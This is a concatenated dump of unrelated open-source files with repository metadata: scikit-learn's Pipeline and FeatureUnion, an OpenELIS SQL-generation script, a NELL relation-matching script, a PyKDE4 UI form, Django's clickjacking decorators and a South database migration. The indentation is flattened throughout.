if not hasattr(estimator, "fit"):
raise TypeError("Last step of chain should implement fit "
"'%s' (type %s) doesn't)"
% (estimator, type(estimator)))
@property
def _estimator_type(self):
return self.steps[-1][1]._estimator_type
def get_params(self, deep=True):
if not deep:
return super(Pipeline, self).get_params(deep=False)
else:
out = self.named_steps
for name, step in six.iteritems(self.named_steps):
for key, value in six.iteritems(step.get_params(deep=True)):
out['%s__%s' % (name, key)] = value
out.update(super(Pipeline, self).get_params(deep=False))
return out
@property
def named_steps(self):
return dict(self.steps)
@property
def _final_estimator(self):
return self.steps[-1][1]
# Estimator interface
def _pre_transform(self, X, y=None, **fit_params):
fit_params_steps = dict((step, {}) for step, _ in self.steps)
for pname, pval in six.iteritems(fit_params):
step, param = pname.split('__', 1)
fit_params_steps[step][param] = pval
Xt = X
for name, transform in self.steps[:-1]:
if hasattr(transform, "fit_transform"):
Xt = transform.fit_transform(Xt, y, **fit_params_steps[name])
else:
Xt = transform.fit(Xt, y, **fit_params_steps[name]) \
.transform(Xt)
return Xt, fit_params_steps[self.steps[-1][0]]
def fit(self, X, y=None, **fit_params):
"""Fit all the transforms one after the other and transform the
data, then fit the transformed data using the final estimator.
Parameters
----------
X : iterable
Training data. Must fulfill input requirements of first step of the
pipeline.
y : iterable, default=None
Training targets. Must fulfill label requirements for all steps of
the pipeline.
"""
Xt, fit_params = self._pre_transform(X, y, **fit_params)
self.steps[-1][-1].fit(Xt, y, **fit_params)
return self
def fit_transform(self, X, y=None, **fit_params):
"""Fit all the transforms one after the other and transform the
data, then use fit_transform on transformed data using the final
estimator.
Parameters
----------
X : iterable
Training data. Must fulfill input requirements of first step of the
pipeline.
y : iterable, default=None
Training targets. Must fulfill label requirements for all steps of
the pipeline.
"""
Xt, fit_params = self._pre_transform(X, y, **fit_params)
if hasattr(self.steps[-1][-1], 'fit_transform'):
return self.steps[-1][-1].fit_transform(Xt, y, **fit_params)
else:
return self.steps[-1][-1].fit(Xt, y, **fit_params).transform(Xt)
@if_delegate_has_method(delegate='_final_estimator')
def predict(self, X):
"""Applies transforms to the data, and the predict method of the
final estimator. Valid only if the final estimator implements
predict.
Parameters
----------
X : iterable
Data to predict on. Must fulfill input requirements of first step of
the pipeline.
"""
Xt = X
for name, transform in self.steps[:-1]:
Xt = transform.transform(Xt)
return self.steps[-1][-1].predict(Xt)
@if_delegate_has_method(delegate='_final_estimator')
def fit_predict(self, X, y=None, **fit_params):
"""Applies fit_predict of last step in pipeline after transforms.
Applies fit_transforms of a pipeline to the data, followed by the
fit_predict method of the final estimator in the pipeline. Valid
only if the final estimator implements fit_predict.
Parameters
----------
X : iterable
Training data. Must fulfill input requirements of first step of
the pipeline.
y : iterable, default=None
Training targets. Must fulfill label requirements for all steps
of the pipeline.
"""
Xt, fit_params = self._pre_transform(X, y, **fit_params)
return self.steps[-1][-1].fit_predict(Xt, y, **fit_params)
@if_delegate_has_method(delegate='_final_estimator')
def predict_proba(self, X):
"""Applies transforms to the data, and the predict_proba method of the
final estimator. Valid only if the final estimator implements
predict_proba.
Parameters
----------
X : iterable
Data to predict on. Must fulfill input requirements of first step of
the pipeline.
"""
Xt = X
for name, transform in self.steps[:-1]:
Xt = transform.transform(Xt)
return self.steps[-1][-1].predict_proba(Xt)
@if_delegate_has_method(delegate='_final_estimator')
def decision_function(self, X):
"""Applies transforms to the data, and the decision_function method of
the final estimator. Valid only if the final estimator implements
decision_function.
Parameters
----------
X : iterable
Data to predict on. Must fulfill input requirements of first step of
the pipeline.
"""
Xt = X
for name, transform in self.steps[:-1]:
Xt = transform.transform(Xt)
return self.steps[-1][-1].decision_function(Xt)
@if_delegate_has_method(delegate='_final_estimator')
def predict_log_proba(self, X):
"""Applies transforms to the data, and the predict_log_proba method of
the final estimator. Valid only if the final estimator implements
predict_log_proba.
Parameters
----------
X : iterable
Data to predict on. Must fulfill input requirements of first step of
the pipeline.
"""
Xt = X
for name, transform in self.steps[:-1]:
Xt = transform.transform(Xt)
return self.steps[-1][-1].predict_log_proba(Xt)
@if_delegate_has_method(delegate='_final_estimator')
def transform(self, X):
"""Applies transforms to the data, and the transform method of the
final estimator. Valid only if the final estimator implements
transform.
Parameters
----------
X : iterable
Data to predict on. Must fulfill input requirements of first step of
the pipeline.
"""
Xt = X
for name, transform in self.steps:
Xt = transform.transform(Xt)
return Xt
@if_delegate_has_method(delegate='_final_estimator')
def inverse_transform(self, X):
"""Applies inverse transform to the data.
Starts with the last step of the pipeline and applies ``inverse_transform`` in
inverse order of the pipeline steps.
Valid only if all steps of the pipeline implement inverse_transform.
Parameters
----------
X : iterable
Data to inverse transform. Must fulfill output requirements of the
last step of the pipeline.
"""
if X.ndim == 1:
warn("From version 0.19, a 1d X will not be reshaped in"
" pipeline.inverse_transform any more.", FutureWarning)
X = X[None, :]
Xt = X
for name, step in self.steps[::-1]:
Xt = step.inverse_transform(Xt)
return Xt
@if_delegate_has_method(delegate='_final_estimator')
def score(self, X, y=None):
"""Applies transforms to the data, and the score method of the
final estimator. Valid only if the final estimator implements
score.
Parameters
----------
X : iterable
Data to score. Must fulfill input requirements of first step of the
pipeline.
y : iterable, default=None
Targets used for scoring. Must fulfill label requirements for all steps of
the pipeline.
"""
Xt = X
for name, transform in self.steps[:-1]:
Xt = transform.transform(Xt)
return self.steps[-1][-1].score(Xt, y)
@property
def classes_(self):
return self.steps[-1][-1].classes_
@property
def _pairwise(self):
# check if first estimator expects pairwise input
return getattr(self.steps[0][1], '_pairwise', False)
def _name_estimators(estimators):
"""Generate names for estimators."""
names = [type(estimator).__name__.lower() for estimator in estimators]
namecount = defaultdict(int)
for est, name in zip(estimators, names):
namecount[name] += 1
for k, v in list(six.iteritems(namecount)):
if v == 1:
del namecount[k]
for i in reversed(range(len(estimators))):
name = names[i]
if name in namecount:
names[i] += "-%d" % namecount[name]
namecount[name] -= 1
return list(zip(names, estimators))
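# Illustrative sketch (not part of the original module) of how _name_estimators
# names duplicate estimator types: unique types keep their bare lowercase class
# name, duplicates get a "-<n>" suffix. Assuming PCA and GaussianNB are importable:
#
#     >>> from sklearn.decomposition import PCA
#     >>> from sklearn.naive_bayes import GaussianNB
#     >>> _name_estimators([PCA(), PCA(), GaussianNB()])
#     [('pca-1', PCA(...)), ('pca-2', PCA(...)), ('gaussiannb', GaussianNB(...))]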
def make_pipeline(*steps):
"""Construct a Pipeline from the given estimators.
This is a shorthand for the Pipeline constructor; it does not require, and
does not permit, naming the estimators. Instead, they will be given names
automatically based on their types.
Examples
--------
>>> from sklearn.naive_bayes import GaussianNB
>>> from sklearn.preprocessing import StandardScaler
>>> make_pipeline(StandardScaler(), GaussianNB()) # doctest: +NORMALIZE_WHITESPACE
Pipeline(steps=[('standardscaler',
StandardScaler(copy=True, with_mean=True, with_std=True)),
('gaussiannb', GaussianNB())])
Returns
-------
p : Pipeline
"""
return Pipeline(_name_estimators(steps))
def _fit_one_transformer(transformer, X, y):
return transformer.fit(X, y)
def _transform_one(transformer, name, X, transformer_weights):
if transformer_weights is not None and name in transformer_weights:
        # if we have a weight for this transformer, multiply output
return transformer.transform(X) * transformer_weights[name]
return transformer.transform(X)
def _fit_transform_one(transformer, name, X, y, transformer_weights,
**fit_params):
if transformer_weights is not None and name in transformer_weights:
        # if we have a weight for this transformer, multiply output
if hasattr(transformer, 'fit_transform'):
X_transformed = transformer.fit_transform(X, y, **fit_params)
return X_transformed * transformer_weights[name], transformer
else:
X_transformed = transformer.fit(X, y, **fit_params).transform(X)
return X_transformed * transformer_weights[name], transformer
if hasattr(transformer, 'fit_transform'):
X_transformed = transformer.fit_transform(X, y, **fit_params)
return X_transformed, transformer
else:
X_transformed = transformer.fit(X, y, **fit_params).transform(X)
return X_transformed, transformer
class FeatureUnion(BaseEstimator, TransformerMixin):
"""Concatenates results of multiple transformer objects.
This estimator applies a list of transformer objects in parallel to the
input data, then concatenates the results. This is useful to combine
several feature extraction mechanisms into a single transformer.
Read more in the :ref:`User Guide <feature_union>`.
Parameters
----------
transformer_list: list of (string, transformer) tuples
List of transformer objects to be applied to the data. The first
half of each tuple is the name of the transformer.
n_jobs: int, optional
Number of jobs to run in parallel (default 1).
transformer_weights: dict, optional
Multiplicative weights for features per transformer.
Keys are transformer names, values the weights.
"""
def __init__(self, transformer_list, n_jobs=1, transformer_weights=None):
self.transformer_list = transformer_list
self.n_jobs = n_jobs
self.transformer_weights = transformer_weights
def get_feature_names(self):
"""Get feature names from all transformers.
Returns
-------
feature_names : list of strings
Names of the features produced by transform.
"""
feature_names = []
for name, trans in self.transformer_list:
if not hasattr(trans, 'get_feature_names'):
raise AttributeError("Transformer %s does not provide"
" get_feature_names." % str(name))
feature_names.extend([name + "__" + f for f in
trans.get_feature_names()])
return feature_names
def fit(self, X, y=None):
"""Fit all transformers using X.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Input data, used to fit transformers.
"""
transformers = Parallel(n_jobs=self.n_jobs)(
delayed(_fit_one_transformer)(trans, X, y)
for name, trans in self.transformer_list)
self._update_transformer_list(transformers)
return self
def fit_transform(self, X, y=None, **fit_params):
"""Fit all transformers using X, transform the data and concatenate
results.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Input data to be transformed.
Returns
-------
X_t : array-like or sparse matrix, shape (n_samples, sum_n_components)
hstack of results of transformers. sum_n_components is the
sum of n_components (output dimension) over transformers.
"""
result = Parallel(n_jobs=self.n_jobs)(
delayed(_fit_transform_one)(trans, name, X, y,
self.transformer_weights, **fit_params)
for name, trans in self.transformer_list)
Xs, transformers = zip(*result)
self._update_transformer_list(transformers)
if any(sparse.issparse(f) for f in Xs):
Xs = sparse.hstack(Xs).tocsr()
else:
Xs = np.hstack(Xs)
return Xs
def transform(self, X):
"""Transform X separately by each transformer, concatenate results.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Input data to be transformed.
Returns
-------
X_t : array-like or sparse matrix, shape (n_samples, sum_n_components)
hstack of results of transformers. sum_n_components is the
sum of n_components (output dimension) over transformers.
"""
Xs = Parallel(n_jobs=self.n_jobs)(
delayed(_transform_one)(trans, name, X, self.transformer_weights)
for name, trans in self.transformer_list)
if any(sparse.issparse(f) for f in Xs):
Xs = sparse.hstack(Xs).tocsr()
else:
Xs = np.hstack(Xs)
return Xs
def get_params(self, deep=True):
if not deep:
return super(FeatureUnion, self).get_params(deep=False)
else:
out = dict(self.transformer_list)
for name, trans in self.transformer_list:
for key, value in iteritems(trans.get_params(deep=True)):
out['%s__%s' % (name, key)] = value
out.update(super(FeatureUnion, self).get_params(deep=False))
return out
def _update_transformer_list(self, transformers):
self.transformer_list[:] = [
(name, new)
for ((name, old), new) in zip(self.transformer_list, transformers)
]
# XXX it would be nice to have a keyword-only n_jobs argument to this function,
# but that's not allowed in Python 2.x.
def make_union(*transformers):
"""Construct a FeatureUnion from the given transformers.
This is a shorthand for the FeatureUnion constructor; it does not require,
and does not permit, naming the transformers. Instead, they will be given
names automatically based on their types. It also does not allow weighting.
Examples
--------
>>> from sklearn.decomposition import PCA, TruncatedSVD
>>> make_union(PCA(), TruncatedSVD()) # doctest: +NORMALIZE_WHITESPACE
FeatureUnion(n_jobs=1,
transformer_list=[('pca', PCA(copy=True, n_components=None,
whiten=False)),
('truncatedsvd',
TruncatedSVD(algorithm='randomized',
n_components=2, n_iter=5,
random_state=None, tol=0.0))],
transformer_weights=None)
Returns
-------
f : FeatureUnion
"""
return FeatureUnion(_name_estimators(transformers))
| bsd-3-clause |
CalebSLane/openelisglobal-core | liquibase/OE2.9/testCatalogHT_LNSP/scripts/sampleType.py | 6 | 1886 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
existing_types = []
sample_types = []
sample_type_file = open("sampleType.txt")
existing_types_file = open("currentSampleTypes.txt")
results = open("output/sampleTypeOutput.txt", 'w')
def write_massive_type_of_sample():
results.write("\nPaste following in SampleType.sql\n\n")
sql_insert = "INSERT INTO type_of_sample( id, description, domain, lastupdated, local_abbrev, display_key, is_active )\n\tVALUES ("
for line in sample_types:
if line not in existing_types and len(line) > 1:
results.write(sql_insert)
results.write( " nextval( 'type_of_sample_seq' ) , '" + line + "','H', now() , '" + line[:10] + "', 'sample.type." + line.split()[0] + "', 'Y');\n" );
def write_sample_type_order():
results.write("\nPaste following in TypeOrder.sql\n\n")
order = 10
for line in sample_types:
results.write("update clinlims.type_of_sample set sort_order=" + str(order) + " where description ILIKE '" + line + "';\n")
order = order + 10
def write_inactive_list():
results.write('\nPaste following in inactivateSampleTypes.sql in the set inactive list\n\n')
results.write("update clinlims.type_of_sample set is_active=\'N\' where name in (")
for line in existing_types:
if line not in sample_types:
results.write('\'' + line + '\', ')
results.write(');')
for line in sample_type_file:
if len(line) > 1:
if line.strip() not in sample_types:
sample_types.append(line.strip())
for line in existing_types_file:
if len(line) > 0:
existing_types.append(line.strip())
existing_types_file.close()
write_massive_type_of_sample()
write_sample_type_order()
write_inactive_list()
print "Done check file sampleTypeOutput.txt"
results.close(); | mpl-2.0 |
vedsarkushwaha/KBH_NELL | predicate_extraction_node_matching.py | 1 | 3299 | from read_data import read_graph_nodes,read_relation_name
import os
from nltk.stem.snowball import SnowballStemmer
from nltk import word_tokenize
'''
* python file which matches verbs
*
* Copyright 2015 Vedsar
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
'''
def chk_line(line):
if len(line)==0:
return 0
lst=line.split('\t')
if len(lst)<3:
return 0
for i in lst:
if len(i)<1:
return 0
return 1
def node_matching(relations,user_query,dict1):
stemmer=SnowballStemmer('english')
user_query_list=map(str,map(stemmer.stem,word_tokenize(user_query)))
user_query_set=set(user_query_list)
ans_found=0
r=[]
#print user_query_list
#print relations
for j in relations:
#get the subject and object for j
i='concept:'+''.join(j.split(" "))+'/scores.tsv'
source_list=[]
target_list=[]
score_list=[]
#print j
with open(os.path.join('nell_pca_svo_pra',i),'r') as fp:
for line in fp:
if(chk_line(line)):
n1,n2,score=map(float,line.split('\t')[:3])
if score>1:
#print n1,n2
source_list.append(n1)
target_list.append(n2)
score_list.append(score)
#convert node to human readable forms
source_list=read_graph_nodes(dict1,source_list)
target_list=read_graph_nodes(dict1,target_list)
		#if both the source and target node appear in user_query_set and at least 40% of the relation info matches the user query, keep that relation
#this is where we use similarity technique
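		# Illustrative sketch of the check below with hypothetical stemmed tokens:
		#   relation_info_set = {'athlet', 'play', 'sport', 'michael', 'jordan', 'basketbal'}
		#   user_query_set    = {'michael', 'jordan', 'play', 'basketbal'}
		#   overlap = 4 > len(relation_info_set) * 0.4 = 2.4, so relation j is kept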
for i in range(len(source_list)):
#print source_list[i].split(":")[2],target_list[i].split(":")[2]
if stemmer.stem(source_list[i].split(":")[2]) in user_query_list and stemmer.stem(target_list[i].split(":")[2]) in user_query_list:
#print source_list[i],target_list[i]
				#get both nodes' info, get relation from graph, check 40% matching with user query
relation_info=map(str,map(stemmer.stem,word_tokenize(j)))
relation_info.extend(map(str,map(stemmer.stem,(source_list[i].split(":")[1:]))))
relation_info.extend(map(str,map(stemmer.stem,(target_list[i].split(":")[1:]))))
relation_info_set=set(relation_info)
#print relation_info_set,user_query_set
#print len(relation_info_set.intersection(user_query_set)),len(relation_info_set)/2
if len(relation_info_set.intersection(user_query_set))>len(relation_info_set)*0.4:
r.append(j)
ans_found=1
return r
if __name__=="__main__":
relations=read_relation_name('nell_pca_svo_pra')
dict1={}
with open(os.path.join('nell_pca_svo_graph','node_dict.tsv'),'r') as fp:
for line in fp:
line=line.rstrip('\n')
n_id,name=line.split('\t')
dict1[int(n_id)]=name
user_query=raw_input("Enter the query: ")
r=node_matching(relations,user_query,dict1)
if(len(r)==0):
print 'Not found anything relevant'
else:
for i in r:
print i
| apache-2.0 |
Muugii05/autokey | src/lib/qtui/enginesettings.py | 50 | 2667 | #!/usr/bin/env python
# coding=UTF-8
#
# Generated by pykdeuic4 from enginesettings.ui on Sun Mar 4 11:39:39 2012
#
# WARNING! All changes to this file will be lost.
from PyKDE4 import kdecore
from PyKDE4 import kdeui
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(400, 300)
self.verticalLayout_2 = QtGui.QVBoxLayout(Form)
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.groupBox = QtGui.QGroupBox(Form)
self.groupBox.setObjectName(_fromUtf8("groupBox"))
self.verticalLayout = QtGui.QVBoxLayout(self.groupBox)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.label = QtGui.QLabel(self.groupBox)
self.label.setWordWrap(True)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout.addWidget(self.label)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.folderLabel = QtGui.QLabel(self.groupBox)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.MinimumExpanding, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.folderLabel.sizePolicy().hasHeightForWidth())
self.folderLabel.setSizePolicy(sizePolicy)
self.folderLabel.setObjectName(_fromUtf8("folderLabel"))
self.horizontalLayout.addWidget(self.folderLabel)
self.browseButton = QtGui.QPushButton(self.groupBox)
self.browseButton.setObjectName(_fromUtf8("browseButton"))
self.horizontalLayout.addWidget(self.browseButton)
self.verticalLayout.addLayout(self.horizontalLayout)
self.verticalLayout_2.addWidget(self.groupBox)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_2.addItem(spacerItem)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(kdecore.i18n(_fromUtf8("Form")))
self.groupBox.setTitle(kdecore.i18n(_fromUtf8("User Module Folder")))
self.label.setText(kdecore.i18n(_fromUtf8("Any Python modules placed in this folder will be available for import by scripts.")))
self.folderLabel.setText(kdecore.i18n(_fromUtf8("None selected")))
self.browseButton.setText(kdecore.i18n(_fromUtf8("Browse")))
| gpl-3.0 |
blaze33/django | django/views/decorators/clickjacking.py | 550 | 1759 | from functools import wraps
from django.utils.decorators import available_attrs
def xframe_options_deny(view_func):
"""
Modifies a view function so its response has the X-Frame-Options HTTP
header set to 'DENY' as long as the response doesn't already have that
header set.
e.g.
@xframe_options_deny
def some_view(request):
...
"""
def wrapped_view(*args, **kwargs):
resp = view_func(*args, **kwargs)
if resp.get('X-Frame-Options', None) is None:
resp['X-Frame-Options'] = 'DENY'
return resp
return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)
def xframe_options_sameorigin(view_func):
"""
Modifies a view function so its response has the X-Frame-Options HTTP
header set to 'SAMEORIGIN' as long as the response doesn't already have
that header set.
e.g.
@xframe_options_sameorigin
def some_view(request):
...
"""
def wrapped_view(*args, **kwargs):
resp = view_func(*args, **kwargs)
if resp.get('X-Frame-Options', None) is None:
resp['X-Frame-Options'] = 'SAMEORIGIN'
return resp
return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)
def xframe_options_exempt(view_func):
"""
Modifies a view function by setting a response variable that instructs
XFrameOptionsMiddleware to NOT set the X-Frame-Options HTTP header.
e.g.
@xframe_options_exempt
def some_view(request):
...
"""
def wrapped_view(*args, **kwargs):
resp = view_func(*args, **kwargs)
resp.xframe_options_exempt = True
return resp
return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)
| bsd-3-clause |
ojengwa/oh-mainline | mysite/bugsets/migrations/0006_skillset_to_text.py | 15 | 12211 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'AnnotatedBug.skill_list'
db.add_column('bugsets_annotatedbug', 'skill_list', self.gf('django.db.models.fields.CharField')(default='', max_length=500, blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'AnnotatedBug.skill_list'
db.delete_column('bugsets_annotatedbug', 'skill_list')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 7, 19, 17, 9, 30, 6153)'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 7, 19, 17, 9, 30, 6031)'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'bugsets.annotatedbug': {
'Meta': {'object_name': 'AnnotatedBug'},
'assigned_to': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mentor': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']", 'null': 'True', 'blank': 'True'}),
'skill_list': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'skills': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['bugsets.Skill']", 'symmetrical': 'False'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'u'", 'max_length': '1'}),
'time_estimate': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '200'})
},
'bugsets.bugset': {
'Meta': {'object_name': 'BugSet'},
'bugs': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['bugsets.AnnotatedBug']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'bugsets.skill': {
'Meta': {'object_name': 'Skill'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'text': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'customs.webresponse': {
'Meta': {'object_name': 'WebResponse'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'response_headers': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.IntegerField', [], {}),
'text': ('django.db.models.fields.TextField', [], {}),
'url': ('django.db.models.fields.TextField', [], {})
},
'profile.dataimportattempt': {
'Meta': {'object_name': 'DataImportAttempt'},
'completed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.utcnow'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'query': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'web_response': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['customs.WebResponse']", 'null': 'True'})
},
'profile.person': {
'Meta': {'object_name': 'Person'},
'bio': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'blacklisted_repository_committers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['profile.RepositoryCommitter']", 'symmetrical': 'False'}),
'contact_blurb': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'dont_guess_my_location': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_me_re_projects': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'expand_next_steps': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'gotten_name_from_ohloh': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'homepage_url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'irc_nick': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'last_polled': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1970, 1, 1, 0, 0)'}),
'latitude': ('django.db.models.fields.FloatField', [], {'default': '-37.3049962'}),
'location_confirmed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'location_display_name': ('django.db.models.fields.CharField', [], {'default': "'Inaccessible Island'", 'max_length': '255', 'blank': 'True'}),
'longitude': ('django.db.models.fields.FloatField', [], {'default': '-12.6790445'}),
'photo': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100'}),
'photo_thumbnail': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100', 'null': 'True'}),
'photo_thumbnail_20px_wide': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100', 'null': 'True'}),
'photo_thumbnail_30px_wide': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100', 'null': 'True'}),
'show_email': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'profile.repositorycommitter': {
'Meta': {'unique_together': "(('project', 'data_import_attempt'),)", 'object_name': 'RepositoryCommitter'},
'data_import_attempt': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.DataImportAttempt']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"})
},
'search.project': {
'Meta': {'object_name': 'Project'},
'cached_contributor_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True'}),
'created_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'date_icon_was_fetched_from_ohloh': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'display_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200'}),
'homepage': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'icon_for_profile': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_for_search_result': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_raw': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'icon_smaller_for_badge': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'logo_contains_name': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'people_who_wanna_help': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'projects_i_wanna_help'", 'symmetrical': 'False', 'to': "orm['profile.Person']"})
}
}
complete_apps = ['bugsets']
